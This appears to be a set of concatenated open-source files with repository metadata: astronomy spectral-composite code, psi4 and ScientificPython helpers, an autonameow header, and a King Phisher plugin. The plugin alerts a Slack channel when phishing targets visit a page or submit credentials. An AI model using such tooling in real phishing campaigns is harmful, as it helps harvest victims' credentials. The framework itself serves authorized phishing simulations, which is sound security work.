oiii_left = np.sum(rest_allflux[index_oiii-25:index_oiii-15, :]*(rest_allivar[index_oiii-25:index_oiii-15, :]>0), axis=0)/(25.-15.)
oiii_right = np.sum(rest_allflux[index_oiii+15:index_oiii+25, :]*(rest_allivar[index_oiii+15:index_oiii+25, :]>0), axis=0)/(25.-15.)
oiii_cont = (oiii_left+oiii_right)/2.
oiiiew = (oiiisum-oiii_cont*dwave)/oiii_cont
oiiilum = (oiiisum-oiii_cont*dwave)*np.power(cosmo.luminosity_distance(z), 2)*4.*np.pi*np.power(Mpc_cm,2)*1E-17
index_hbeta = np.searchsorted(master_wave, 4862.64)
dnhbetawave = 10
dwave = np.median(master_wave[index_hbeta-dnhbetawave:index_hbeta+dnhbetawave]-master_wave[index_hbeta-dnhbetawave-1:index_hbeta+dnhbetawave-1])
print("dwave: {0}".format(dwave))
hbetasum = np.sum(rest_allflux[index_hbeta-dnhbetawave:index_hbeta+dnhbetawave, :]*(rest_allivar[index_hbeta-dnhbetawave:index_hbeta+dnhbetawave, :]>0), axis=0)*dwave
print("allfinite: {0}".format(np.count_nonzero(np.isfinite(hbetasum))))
hbeta_left = np.sum(rest_allflux[index_hbeta-25:index_hbeta-15, :]*(rest_allivar[index_hbeta-25:index_hbeta-15, :]>0), axis=0)/(25.-15.)
hbeta_right = np.sum(rest_allflux[index_hbeta+15:index_hbeta+25, :]*(rest_allivar[index_hbeta+15:index_hbeta+25, :]>0), axis=0)/(25.-15.)
hbeta_cont = (hbeta_left+hbeta_right)/2.
hbetaew = (hbetasum-hbeta_cont*dwave)/hbeta_cont
hbetalum = (hbetasum-hbeta_cont*dwave)*np.power(cosmo.luminosity_distance(z), 2)*4.*np.pi*np.power(Mpc_cm,2)*1E-17
outstr_dtype = [('Z', 'f4', z.shape),
('OIILUM', 'f8', oiilum.shape),
('OIIEW', 'f8', oiiew.shape),
('OIIILUM', 'f8', oiiilum.shape),
('OIIIEW', 'f8', oiiiew.shape),
('HBETALUM', 'f8', hbetalum.shape),
('HBETAEW', 'f8', hbetaew.shape),
]
outstr = np.array([(z, oiilum, oiiew, oiiilum, oiiiew, hbetalum, hbetaew)],
dtype=outstr_dtype)
print("Write into file: {0}.".format(outfile))
fits = fitsio.FITS(outfile, 'rw', clobber=overwrite)
fits.write(outstr)
fits.close()
def new_composite_engine(wave, flux, ivar, polyorder=2, oii=False, o3=False, bootstrap=False, nbootstrap=_nbootstrap):
"""All the composites should be made with this engine.
- mean doesn't work for noisy data yet
- mask is given by _contmask
"""
loglam = np.log10(wave)
nwave = wave.size
nobj = flux.size/wave.size
mask = make_mask(wave, oii=oii, o3=o3)
masksize = np.count_nonzero(mask)
if masksize>10:
x = loglam[mask]
# Median, not entirely necessary
obj_median = nanmedian(flux[mask, :], axis=0)
y_median = flux/obj_median.reshape(1, nobj)
norm_median = np.zeros(y_median.shape)
for iobj in np.arange(nobj):
continuum = calculate_continuum(loglam, flux[:,iobj], ivar[:,iobj], mask, polyorder)
norm_median[:,iobj] = y_median[:, iobj]/continuum
norm_median[ivar<=0] = np.nan
# Bootstrapping:
if bootstrap:
median_norm_median = np.zeros((nwave, nbootstrap))
mean_norm_median = np.zeros((nwave, nbootstrap))
# Composite
pbar = ProgressBar(maxval=nbootstrap).start()
for iboot in np.arange(nbootstrap):
pbar.update(iboot)
index_boot = np.random.randint(0, nobj, size=nobj)
median_norm_median_tmp = nanmedian(norm_median[:, index_boot], axis=1)
mean_norm_median_tmp = nanmean(norm_median[:, index_boot], axis=1)
# Median
y = median_norm_median_tmp[mask]
z = np.polyfit(x, y, polyorder)
p = np.poly1d(z)
continuum = p(loglam)
median_norm_median[:, iboot] = median_norm_median_tmp/continuum
# Mean
y = mean_norm_median_tmp[mask]
z = np.polyfit(x, y, polyorder)
p = np.poly1d(z)
continuum = p(loglam)
mean_norm_median[:, iboot] = mean_norm_median_tmp/continuum
pbar.finish()
# Regular
else:
# Composite
median_norm_median = nanmedian(norm_median, axis=1)
mean_norm_median = nanmean(norm_median, axis=1)
# Median
y = median_norm_median[mask]
z = np.polyfit(x, y, polyorder)
p = np.poly1d(z)
continuum = p(loglam)
median_norm_median = median_norm_median/continuum
# Mean
y = mean_norm_median[mask]
z = np.polyfit(x, y, polyorder)
p = np.poly1d(z)
continuum = p(loglam)
mean_norm_median = mean_norm_median/continuum
return (median_norm_median, mean_norm_median)
def new_feiimgii_composite(zmin=_zmin, zmax=_zmax, polyorder=3, bootstrap=False, nbootstrap=_nbootstrap):
# Read in
objs_ori = elg_readin()
(master_wave, rest_allflux, rest_allivar) = rest_allspec_readin()
master_loglam = np.log10(master_wave)
#wave_pos = np.array([2200., 4050.])
# Extended to 5200 to include [OIII] 5007 -- Guangtun, 06/08/2015
wave_pos = np.array([2200., 5200.])
# zmin<z<zmax; zGOOD==1; CLASS='GALAXY'
zindex = (np.where(np.logical_and(np.logical_and(np.logical_and(
objs_ori['zGOOD']==1, objs_ori['Z']>zmin), objs_ori['Z']<zmax), objs_ori['CLASS']=='GALAXY')))[0]
print(zindex.shape)
rest_loc = np.searchsorted(master_wave, wave_pos)
outwave = master_wave[rest_loc[0]:rest_loc[1]]
outloglam = np.log10(outwave)
tmpflux = rest_allflux[rest_loc[0]:rest_loc[1],zindex]
tmpivar = rest_allivar[rest_loc[0]:rest_loc[1],zindex]
(fluxmedian, fluxmean) = new_composite_engine(outwave, tmpflux, tmpivar, polyorder, bootstrap=bootstrap, nbootstrap=nbootstrap)
(oiifluxmedian, oiifluxmean) = new_composite_engine(outwave, tmpflux, tmpivar, polyorder=2, oii=True, bootstrap=bootstrap, nbootstrap=nbootstrap)
(oiiifluxmedian, oiiifluxmean) = new_composite_engine(outwave, tmpflux, tmpivar, polyorder=2, o3=True, bootstrap=bootstrap, nbootstrap=nbootstrap)
return (outwave, fluxmedian, fluxmean, oiifluxmedian, oiifluxmean, oiiifluxmedian, oiiifluxmean)
def save_feiimgii_composite(bootstrap=False, nbootstrap=_nbootstrap, overwrite=False):
"""
"""
outfile = feiimgii_composite_filename(bootstrap=bootstrap)
if isfile(outfile) and not overwrite:
print("File {0} exists. Set overwrite=True to overwrite it.".format(outfile))
return -1
(outwave, fluxmedian, fluxmean, oiifluxmedian, oiifluxmean, oiiifluxmedian, oiiifluxmean) = new_feiimgii_composite(bootstrap=bootstrap, nbootstrap=nbootstrap)
nwave = outwave.size
outstr_dtype = [('WAVE', 'f4', outwave.shape),
('FLUXMEDIAN', 'f4', fluxmedian.shape),
('FLUXMEAN', 'f4', fluxmean.shape),
('OII_FLUXMEDIAN', 'f4', oiifluxmedian.shape),
('OII_FLUXMEAN', 'f4', oiifluxmean.shape),
('OIII_FLUXMEDIAN', 'f4', oiiifluxmedian.shape),
('OIII_FLUXMEAN', 'f4', oiiifluxmean.shape)]
outstr = np.array([(outwave, fluxmedian, fluxmean, oiifluxmedian, oiifluxmean, oiiifluxmedian, oiiifluxmean)],
dtype=outstr_dtype)
print("Write into file: {0}.".format(outfile))
fits = fitsio.FITS(outfile, 'rw', clobber=overwrite)
fits.write(outstr)
fits.close()
# For OII dependence, let's duplicate these two routines but remember to double check if the original two routines change
def new_feiimgii_composite_binoii(zmin=_zmin, zmax=_zmax, polyorder=3, bootstrap=False, nbootstrap=_nbootstrap):
# Read in
objs_ori = elg_readin()
vac_objs = elg_readin(vac=True)
(master_wave, rest_allflux, rest_allivar) = rest_allspec_readin()
master_loglam = np.log10(master_wave)
#wave_pos = np.array([2200., 4050.])
# Extended to 5200 to include [OIII] 5007 -- Guangtun, 06/08/2015
wave_pos = np.array([2200., 5200.])
# zmin<z<zmax; zGOOD==1; CLASS='GALAXY'
zindex = (np.where(np.logical_and(np.logical_and(np.logical_and(
objs_ori['zGOOD']==1, objs_ori['Z']>zmin), objs_ori['Z']<zmax), objs_ori['CLASS']=='GALAXY')))[0]
print(zindex.shape)
rest_loc = np.searchsorted(master_wave, wave_pos)
outwave = master_wave[rest_loc[0]:rest_loc[1]]
outloglam = np.log10(outwave)
tmpflux = rest_allflux[rest_loc[0]:rest_loc[1],zindex]
tmpivar = rest_allivar[rest_loc[0]:rest_loc[1],zindex]
oiiew = vac_objs['OIIEW'][zindex]
logoiilum = np.log10(vac_objs['OIILUM'][zindex])
oiiewmin, oiiewmax, oiiewbin, oiilummin, oiilummax, oiilumbin = make_oiiewbins()
for i in np.arange(oiiewmin.size):
ewbin = (np.where(np.logical_and(oiiew>oiiewmin[i], oiiew<oiiewmax[i])))[0]
oii_tmpflux = tmpflux[:,ewbin]
oii_tmpivar = tmpivar[:,ewbin]
(ewtmp_fluxmedian, ewtmp_fluxmean) = new_composite_engine(outwave, oii_tmpflux, oii_tmpivar, polyorder, bootstrap=bootstrap, nbootstrap=nbootstrap)
(ewtmp_oiifluxmedian, ewtmp_oiifluxmean) = new_composite_engine(outwave, oii_tmpflux, oii_tmpivar, polyorder=2, oii=True, bootstrap=bootstrap, nbootstrap=nbootstrap)
(ewtmp_oiiifluxmedian, ewtmp_oiiifluxmean) = new_composite_engine(outwave, oii_tmpflux, oii_tmpivar, polyorder=2, o3=True, bootstrap=bootstrap, nbootstrap=nbootstrap)
lumbin = (np.where(np.logical_and(logoiilum>oiilummin[i], logoiilum<oiilummax[i])))[0]
oii_tmpflux = tmpflux[:,lumbin]
oii_tmpivar = tmpivar[:,lumbin]
(lumtmp_fluxmedian, lumtmp_fluxmean) = new_composite_engine(outwave, oii_tmpflux, oii_tmpivar, polyorder, bootstrap=bootstrap, nbootstrap=nbootstrap)
(lumtmp_oiifluxmedian, lumtmp_oiifluxmean) = new_composite_engine(outwave, oii_tmpflux, oii_tmpivar, polyorder=2, oii=True, bootstrap=bootstrap, nbootstrap=nbootstrap)
(lumtmp_oiiifluxmedian, lumtmp_oiiifluxmean) = new_composite_engine(outwave, oii_tmpflux, oii_tmpivar, polyorder=2, o3=True, bootstrap=bootstrap, nbootstrap=nbootstrap)
if (i == 0):
outshape = ewtmp_fluxmedian.shape+oiiewmin.shape
ew_fluxmedian = np.zeros(outshape)
ew_fluxmean = np.zeros(outshape)
ew_oiifluxmedian = np.zeros(outshape)
ew_oiifluxmean = np.zeros(outshape)
ew_oiiifluxmedian = np.zeros(outshape)
ew_oiiifluxmean = np.zeros(outshape)
lum_fluxmedian = np.zeros(outshape)
lum_fluxmean = np.zeros(outshape)
lum_oiifluxmedian = np.zeros(outshape)
lum_oiifluxmean = np.zeros(outshape)
lum_oiiifluxmedian = np.zeros(outshape)
lum_oiiifluxmean = np.zeros(outshape)
print("outshape: {0}".format(ew_fluxmedian.shape))
if (not bootstrap):
ew_fluxmedian[:,i] = ewtmp_fluxmedian
ew_fluxmean[:,i] = ewtmp_fluxmean
ew_oiifluxmedian[:,i] = ewtmp_oiifluxmedian
ew_oiifluxmean[:,i] = ewtmp_oiifluxmean
ew_oiiifluxmedian[:,i] = ewtmp_oiiifluxmedian
ew_oiiifluxmean[:,i] = ewtmp_oiiifluxmean
lum_fluxmedian[:,i] = lumtmp_fluxmedian
lum_fluxmean[:,i] = lumtmp_fluxmean
lum_oiifluxmedian[:,i] = lumtmp_oiifluxmedian
lum_oiifluxmean[:,i] = lumtmp_oiifluxmean
lum_oiiifluxmedian[:,i] = lumtmp_oiiifluxmedian
lum_oiiifluxmean[:,i] = lumtmp_oiiifluxmean
else:
ew_fluxmedian[:,:,i] = ewtmp_fluxmedian
ew_fluxmean[:,:,i] = ewtmp_fluxmean
ew_oiifluxmedian[:,:,i] = ewtmp_oiifluxmedian
ew_oiifluxmean[:,:,i] = ewtmp_oiifluxmean
ew_oiiifluxmedian[:,:,i] = ewtmp_oiiifluxmedian
ew_oiiifluxmean[:,:,i] = ewtmp_oiiifluxmean
lum_fluxmedian[:,:,i] = lumtmp_fluxmedian
lum_fluxmean[:,:,i] = lumtmp_fluxmean
lum_oiifluxmedian[:,:,i] = lumtmp_oiifluxmedian
lum_oiifluxmean[:,:,i] = lumtmp_oiifluxmean
lum_oiiifluxmedian[:,:,i] = lumtmp_oiiifluxmedian
lum_oiiifluxmean[:,:,i] = lumtmp_oiiifluxmean
return (outwave, ew_fluxmedian, ew_fluxmean, ew_oiifluxmedian, ew_oiifluxmean, ew_oiiifluxmedian, ew_oiiifluxmean,
lum_fluxmedian,lum_fluxmean,lum_oiifluxmedian,lum_oiifluxmean,lum_oiiifluxmedian,lum_oiiifluxmean)
def save_feiimgii_composite_binoii(bootstrap=False, nbootstrap=_nbootstrap, overwrite=False):
"""
"""
outfile = feiimgii_composite_filename(bootstrap=bootstrap, binoii=True)
if ((isfile(outfile)) and (not overwrite)):
print("File {0} exists. Set overwrite=True to overwrite it.".format(outfile))
return -1
oiiewmin, oiiewmax, oiiewbin, oiilummin, oiilummax, oiilumbin = make_oiiewbins()
outwave, ew_fluxmedian, ew_fluxmean, ew_oiifluxmedian, ew_oiifluxmean, ew_oiiifluxmedian, ew_oiiifluxmean, \
lum_fluxmedian,lum_fluxmean,lum_oiifluxmedian,lum_oiifluxmean,lum_oiiifluxmedian,lum_oiiifluxmean = \
new_feiimgii_composite_binoii(bootstrap=bootstrap, nbootstrap=nbootstrap)
nwave = outwave.size
outstr_dtype = [('WAVE', 'f4', outwave.shape),
('EWFLUXMEDIAN', 'f4', ew_fluxmedian.shape),
#('EWFLUXMEAN', 'f4', ew_fluxmean.shape),
('EWOII_FLUXMEDIAN', 'f4', ew_oiifluxmedian.shape),
#('EWOII_FLUXMEAN', 'f4', ew_oiifluxmean.shape),
('EWOIII_FLUXMEDIAN', 'f4', ew_oiiifluxmedian.shape),
#('EWOIII_FLUXMEAN', 'f4', ew_oiiifluxmean.shape),
('LUMFLUXMEDIAN', 'f4', lum_fluxmedian.shape),
#('LUMFLUXMEAN', 'f4', lum_fluxmean.shape),
('LUMOII_FLUXMEDIAN', 'f4', lum_oiifluxmedian.shape),
#('LUMOII_FLUXMEAN', 'f4', lum_oiifluxmean.shape),
('LUMOIII_FLUXMEDIAN', 'f4', lum_oiiifluxmedian.shape),
#('LUMOIII_FLUXMEAN', 'f4', lum_oiiifluxmean.shape),
('OIIEWMIN', 'f4', oiiewmin.shape),
('OIIEWMAX', 'f4', oiiewmax.shape),
('OIIEWBIN', 'f4', oiiewbin.shape),
('OIILUMMIN', 'f4', oiilummin.shape),
('OIILUMMAX', 'f4', oiilummax.shape),
('OIILUMBIN', 'f4', oiilumbin.shape)]
outstr = np.array([(outwave, ew_fluxmedian, ew_oiifluxmedian, ew_oiiifluxmedian, lum_fluxmedian, lum_oiifluxmedian, lum_oiiifluxmedian,
oiiewmin, oiiewmax, oiiewbin, oiilummin, oiilummax, oiilumbin)],
dtype=outstr_dtype)
print("Write into file: {0}.".format(outfile))
fits = fitsio.FITS(outfile, 'rw', clobber=overwrite)
fits.write(outstr)
fits.close()
#def make_model(lines):
# """Make a model for a normalized spectrum
# In logarithmic space
# """
#
# dloglam = 1E-4 # or 69./3E5/np.log(10.)
# left_bound = 10.*dloglam # pixels
# right_bound = 5.*dloglam # pixels
# width = 200./3E5/np.log(10.) # Delta_v/c in unit of log_10(lambda), 200 km/s
# min_width = 50./3E5/np.log(10.) #
# max_width = 2000./3E5/np.log(10.) #
# namp = 10 # maximum amplitude
#
# full_model = {}
#
# # Underlying quadratic model
# tmp_prefix = 'Quadratic_'
# full_model[0] = lmfit.models.QuadraticModel(prefix=tmp_prefix)
#
# pars = full_model[0].make_params()
# pars[tmp_prefix+'a'].set(0., min=-0.1, max=0.1)
# pars[tmp_prefix+'b'].set(0., min=-0.5, max=0.5)
# pars[tmp_prefix+'c'].set(1., min=0.9, max=1.1)
#
# # Line Gaussian model
# # Line: 'ELEMENT', 'WAVE', 'EW', 'SIGN'
# nlines = lines.size
# if nlines==0: return (full_model[0], pars)
#
# for (iline, this_line) in zip(np.arange(nlines)+len(full_model), lines):
# tmp_prefix = this_line['ELEMENT']+'_'+'{0:02d}'.format(iline)+'_'
# full_model[iline] = lmfit.models.GaussianModel(prefix=tmp_prefix)
#
# pars.update(full_model[iline].make_params())
# tmp_wave = this_line['WAVE']-1.
# tmp_loglam = np.log10(this_line['WAVE']-1.)
#
# tmp_left = np.log10(this_line['WAVE']-left_bound)
# tmp_right = np.log10(this_line['WAVE']-right_bound)
# pars[tmp_prefix+'center'].set(tmp_loglam, min=tmp_left, max=tmp_right)
# pars[tmp_prefix+'sigma'].set(width, min=min_width, max=max_width)
#
# tmp_sign = this_line['SIGN']
# tmp_amp = tmp_sign*this_line['EW']/tmp_wave/np.log(10.)
# if tmp_sign>0:
# pars[tmp_prefix+'amplitude'].set(tmp_amp, min=0, max=tmp_amp*namp)
# else:
# pars[tmp_prefix+'amplitude'].set(tmp_amp, min=tmp_amp*namp, max=0)
#
# model = full_model[0]
# for imod in np.arange(len(full_model)-1)+1:
# model = model+full_model[imod]
#
# return (model, pars)
#
#
# All stuff below must be obsolete
# The new one is new_feiimgii_composite
#def feiimgii_composite(zmin=0.6, zmax=1.2):
# Read in
# objs_ori = elg_readin()
# (master_wave, rest_allflux, rest_allivar) = rest_allspec_readin()
# master_loglam = np.log10(master_wave)
#
# wave_pos = np.array([2200., 4050.])
# #zmin = _minmaxwave[0]/wave_pos[0]-1.
# #zmax = _minmaxwave[1]/wave_pos[1]-1.
# # zmin<z<zmax; zGOOD==1; CLASS='GALAXY'
# zindex = (np.where(np.logical_and(np.logical_and(np.logical_and(
# objs_ori['zGOOD']==1, objs_ori['Z']>zmin), objs_ori['Z']<zmax), objs_ori['CLASS']=='GALAXY')))[0]
#
# rest_loc = np.searchsorted(master_wave, wave_pos)
# outwave = master_wave[rest_loc[0]:rest_loc[1]]
# outloglam = np.log10(outwave)
#
# tmpflux = rest_allflux[rest_loc[0]:rest_loc[1],zindex]
# tmpivar = rest_allivar[rest_loc[0]:rest_loc[1],zindex]
# fluxmean = np.zeros((tmpflux.shape)[0])
# #fluxmean = np.average(tmpflux, axis=1, weights=tmpivar.astype(bool))
# fluxmedian = np.zeros((tmpflux.shape)[0])
# fluxflag = np.ones(fluxmedian.size)
# for i in np.arange((tmpflux.shape)[0]):
# iuse = (np.where(tmpivar[i,:]>0))[0]
# fluxmedian[i] = np.median(tmpflux[i,iuse])
# fluxmean[i] = np.mean(tmpflux[i,iuse])
#
# # Mask out useless wavelength ranges
# # left 2300
# wave_pos = np.array([2200.])
# rest_loc = np.searchsorted(outwave, wave_pos)
# fluxflag[0:rest_loc[0]] = 0
# # Fe II 2350
# wave_pos = np.array([2330., 2420])
# rest_loc = np.searchsorted(outwave, wave_pos)
# fluxflag[rest_loc[0]:rest_loc[1]] = 0.
# # Fe II 2600
# wave_pos = np.array([2570., 2640])
# rest_loc = np.searchsorted(outwave, wave_pos)
# fluxflag[rest_loc[0]:rest_loc[1]] = 0.
# # Mg II 2800
# wave_pos = np.array([2770., 2820])
# rest_loc = np.searchsorted(outwave, wave_pos)
# fluxflag[rest_loc[0]:rest_loc[1]] = 0.
# # Mg I 2853
# wave_pos = np.array([2843., 2863])
# rest_loc = np.searchsorted(outwave, wave_pos)
# fluxflag[rest_loc[0]:rest_loc[1]] = 0.
# # right 2900
# wave_pos = np.array([2900.])
# rest_loc = np.searchsorted(outwave, wave_pos)
# fluxflag[rest_loc[0]:] = 0.
#
# imask = (np.where(fluxflag>0.))[0]
# if imask.size>10:
# x = outloglam[imask]
# # Mean
# y = fluxmean[imask]
# z = np.polyfit(x, y, 3)
# p = np.poly1d(z)
# continuum = p(outloglam)
# norm_fluxmean = fluxmean/continuum
# # Median
# y = fluxmedian[imask]
# z = np.polyfit(x, y, 3)
# p = np.poly1d(z)
# continuum = p(outloglam)
# norm_fluxmedian = fluxmedian/continuum
#
# return (outwave, fluxmean, fluxmedian, norm_fluxmean, norm_fluxmedian)
#
#def make_model(lines):
# """Make a model for a normalized spectrum
# In logarithmic space
# """
#
# dloglam = 1E-4 # or 69./3E5/np.log(10.)
# left_bound = 10.*dloglam # pixels
# right_bound = 5.*dloglam # pixels
# width = 200./3E5/np.log(10.) # Delta_v/c in unit of log_10(lambda), 200 km/s
# min_width = 50./3E5/np.log(10.) #
# max_width = 2000./3E5/np.log(10.) #
# namp = 10 # maximum amplitude
#
# full_model = {}
#
# # Underlying quadratic model
# tmp_prefix = 'Quadratic_'
# full_model[0] = lmfit.models.QuadraticModel(prefix=tmp_prefix)
#
# pars = full_model[0].make_params()
# pars[tmp_prefix+'a'].set(0., min=-0.1, max=0.1)
# pars[tmp_prefix+'b'].set(0., min=-0.5, max=0.5)
# pars[tmp_prefix+'c'].set(1., min=0.9, max=1.1)
#
# # Line Gaussian model
# # Line: 'ELEMENT', 'WAVE', 'EW', 'SIGN'
# nlines = lines.size
# if nlines==0: return (full_model[0], pars)
#
# for (iline, this_line) in zip(np.arange(nlines)+len(full_model), lines):
# tmp_prefix = this_line['ELEMENT']+'_'+'{0:02d}'.format(iline)+'_'
# full_model[iline] = lmfit.models.GaussianModel(prefix=tmp_prefix)
#
# pars.update(full_model[iline].make_params())
# tmp_wave = this_line['WAVE']-1.
# tmp_loglam = np.log10(this_line['WAVE']-1.)
#
# tmp_left = np.log10(this_line['WAVE']-left_bound)
# tmp_right = np.log10(this_line['WAVE']-right_bound)
# pars[tmp_prefix+'center'].set(tmp_loglam, min=tmp_left, max=tmp_right)
# pars[tmp_prefix+'sigma'].set(width, min=min_width, max=max_width)
#
# tmp_sign = this_line['SIGN']
# tmp_amp = tmp_sign*this_line['EW']/tmp_wave/np.log(10.)
# if tmp_sign>0:
# pars[tmp_prefix+'amplitude'].set(tmp_amp, min=0, max=tmp_amp*namp)
# else:
# pars[tmp_prefix+'amplitude'].set(tmp_amp, min=tmp_amp*namp, max=0)
#
# model = full_model[0]
# for imod in np.arange(len(full_model)-1)+1:
# model = model+full_model[imod]
#
# return (model, pars)
#
#def line_property(loglam, flux, lines, npixels=15):
# """Measure line properties in a normalized spectrum in the rest frame:
# Total equivalent width: REW
# Velocity profile: REW(velocity)/REW(total)
# """
#
# nlines = lines.size
# ew_profile = np.zeros(nlines, dtype=[('WAVE', '({0},)f4'.format(npixels)), ('VEL', '({0},)f4'.format(npixels)), ('EW', '({0},)f4'.format(npixels))])
# for (iline, this_line) in zip(np.arange(nlines), lines):
# tmp_loglam0 = np.log10(this_line['WAVE'])
# tmp_left = np.log10(this_line['WAVELEFT'])
# rest_loc = np.searchsorted(loglam, tmp_left)
# #print(rest_loc)
# #print(np.cumsum(flux[rest_loc:(rest_loc+npixels)]))
# ew_profile[iline]['EW'][:] = np.cumsum(flux[rest_loc:(rest_loc+npixels)])
# #print(ew_profile[iline]['EW'])
# ew_profile[iline]['VEL'][:] = (loglam[rest_loc:(rest_loc+npixels)]-tmp_loglam0)*np.log(10.)*3E5
# ew_profile[iline]['WAVE'][:] = np.power(10, loglam[rest_loc:(rest_loc+npixels)])
#
# return ew_profile
#
#def speclines(region='2800'):
# if region == '2800':
# nlines = 2
# lines = zeros(nlines, dtype=[('SIGN', 'i'),('ELEMENT','S20'),('WAVE','f4'),('EW','f4'), ('WAVELEFT', 'f4')])
# lines[0] = (-1, 'MgII', 2796.35, 2., 2789.)
# lines[1] = (-1, 'MgII', 2803.53, 2., 2798.)
| guangtunbenzhu/BGT-Cosmology | Spectroscopy/archetype/ebossspec.py | Python | mit | 37,112 | [
"Galaxy",
"Gaussian"
] | c06f461f85e722e5b75aa3c91b47e3261b3781d9af717678a557484b7a7eab3e |
import json
import king_phisher.plugins as plugin_opts
import king_phisher.server.database.manager as db_manager
import king_phisher.server.database.models as db_models
import king_phisher.server.plugins as plugins
import king_phisher.server.signals as signals
import king_phisher.utilities as utilities
try:
import requests
except ImportError:
has_requests = False
else:
has_requests = True
EXAMPLE_CONFIG = """\
# Documentation on obtaining a slack webhook url can be found here https://api.slack.com/messaging/webhooks.
webhookurl: https://hooks.slack.com/services/....
channel: <slack channel name>
"""
class Plugin(plugins.ServerPlugin):
authors = ['Sebastian Reitenbach']
classifiers = ['Plugin :: Server :: Notifications']
title = 'Slack Notifications'
description = """
A plugin that uses Slack Webhooks to send notifications
on new website visits and submitted credentials to a slack channel.
Notifications about credentials are sent with @here.
"""
homepage = 'https://github.com/securestate/king-phisher-plugins'
options = [
plugin_opts.OptionString(
name='webhookurl',
description='The slack webhook URL to use'
),
plugin_opts.OptionString(
name='channel',
description='the channel were notifications are supposed to go to'
)
]
req_min_version = '1.4.0'
req_packages = {
'requests': has_requests
}
version = '0.1'
def initialize(self):
signals.server_initialized.connect(self.on_server_initialized)
return True
def on_server_initialized(self, server):
signals.db_session_inserted.connect(self.on_kp_db_event, sender='visits')
signals.db_session_inserted.connect(self.on_kp_db_event, sender='credentials')
self.send_notification('King-Phisher Slack notifications are now active')
def on_kp_db_event(self, sender, targets, session):
for event in targets:
message = db_manager.get_row_by_id(session, db_models.Message, event.message_id)
if sender == 'visits':
message = "New visit from {0} for campaign '{1}'".format(message.target_email, message.campaign.name)
elif sender == 'credentials':
message = "<!here> New credentials received from {0} for campaign '{1}'".format(message.target_email, message.campaign.name)
else:
return
self.send_notification(message)
def send_notification(self, message):
slack_data = {'text': message, 'channel': self.config['channel']}
response = requests.post(
self.config['webhookurl'], data=json.dumps(slack_data),
headers={'Content-Type': 'application/json'}
)
| securestate/king-phisher-plugins | server/slack_notifications.py | Python | bsd-3-clause | 2,604 | [
"VisIt"
] | 0438be731b71bd71b4dd29fac7a5230986830acdcce1988c5ec93e7cb99495a7 |
"""The modules in this subpackage provide visualization of 3D objects
using different backends (VRML, VMD, VPython), but with an almost
identical interface. It is thus possible to write generic 3D graphics
code in which the backend can be changed by modifying a single line
of code.
The intended application of these modules is scientific visualization.
Many sophisticated 3D objects are therefore absent, as are complex
surface definitions such as textures.
"""
| OS2World/DEV-PYTHON-UTIL-ScientificPython | src/Lib/site-packages/Scientific/Visualization/__init__.py | Python | isc | 465 | [
"VMD"
] | c094d83d617cfeff8d0be8c4cedd9abb962483216cdc76b69a52538ef744fa22 |
#
# @BEGIN LICENSE
#
# Psi4: an open-source quantum chemistry software package
#
# Copyright (c) 2007-2017 The Psi4 Developers.
#
# The copyrights for code used from other parties are included in
# the corresponding files.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# @END LICENSE
#
"""
Module of helper functions for distributed ccresponse computations.
Defines functions for retrieving data computed at displaced geometries.
"""
from __future__ import absolute_import
from __future__ import print_function
import collections
import shelve
import copy
import os
from psi4.driver import p4util
from psi4.driver.constants import *
def collect_displaced_matrix_data(db, signature, row_dim):
"""
Gathers a list of tensors, one at each displaced geometry.
db: (database) the database object for this property calculation
signature: (string) The string that notifies the matrix reader that the
targeted tensor data begins.
row_dim: the expected number of rows that this value should be printed
across in the file
Returns a 2d list result[i][j]:
i: indexes displacements
j: indexes elements of the flattened tensor at some displacement
Throws: none
"""
result = []
for job in db['job_status']:
with open('{}/output.dat'.format(job)) as outfile:
result.append(parse_geometry_matrix_data(outfile, signature, row_dim))
return result
# END collect_displaced_matrix_data()
def parse_geometry_matrix_data(outfile, matrix_name, row_tot):
"""
Parses data from a 3 by n matrix printed to a file
outfile: ( file ) handle open in read mode, where the data should be found
matrix_name: ( string ) that indicates the matrix data is found on the lines
below
row_tot: ( int ) indicates the number of lines that the matrix data should
be printed across in the file
Returns: matrix_data a list of matrix elements, len = 3*row_tot
Throws: ParsingError (Collecting matrix data failed) if
It can't find matrix_header in the file.
It found matrix_header, but no data.
It found matrix_header, and data but the number of elements is
incorrect.
"""
collect_matrix = False
n_rows = 0
n_tries = 0
matrix_data = []
for line in outfile:
if matrix_name in line:
collect_matrix = True
if collect_matrix and (n_rows < row_tot):
try:
n_tries += 1
if n_tries > (row_tot + 13):
raise ParsingError('{} Matrix was unreadable. Scanned {}'
'lines.'.format(matrix_name, n_tries))
else:
(index, x, y, z) = line.split()
matrix_data.append(float(x))
matrix_data.append(float(y))
matrix_data.append(float(z))
n_rows += 1
except:
pass
if (n_rows == row_tot) and (len(matrix_data) != 3 * row_tot):
raise p4util.ParsingError('Collecting {} data failed!'
'\nExpected {} elements but only captured {}'.format(
matrix_name, 3 * row_tot, len(matrix_data)))
if len(matrix_data) == 3 * row_tot:
return matrix_data
raise p4util.ParsingError('data for {} was not found in the output file, '
'but it was marked for collection. Check output files '
'in displacement sub-dirs!'.format(matrix_name))
# END parse_geometry_matrix_data()
| kratman/psi4public | psi4/driver/procrouting/findif_response_utils/data_collection_helper.py | Python | gpl-2.0 | 4,299 | [
"Psi4"
] | e86a9d350f77c28000e3fae65006cd2eb74d70d575d201debab360b21dc8f948 |
# -*- coding: utf-8 -*-
# Copyright(c) 2016-2020 Jonas Sjöberg <autonameow@jonasjberg.com>
# Source repository: https://github.com/jonasjberg/autonameow
#
# This file is part of autonameow.
#
# autonameow is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation.
#
# autonameow is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with autonameow. If not, see <http://www.gnu.org/licenses/>.
from analyzers import BaseAnalyzer
from core.truths import known_data_loader
from core.metadata.normalize import cleanup_full_title
from util.text import collapse_whitespace
from util.text import regexbatch
from util.text import remove_blacklisted_lines
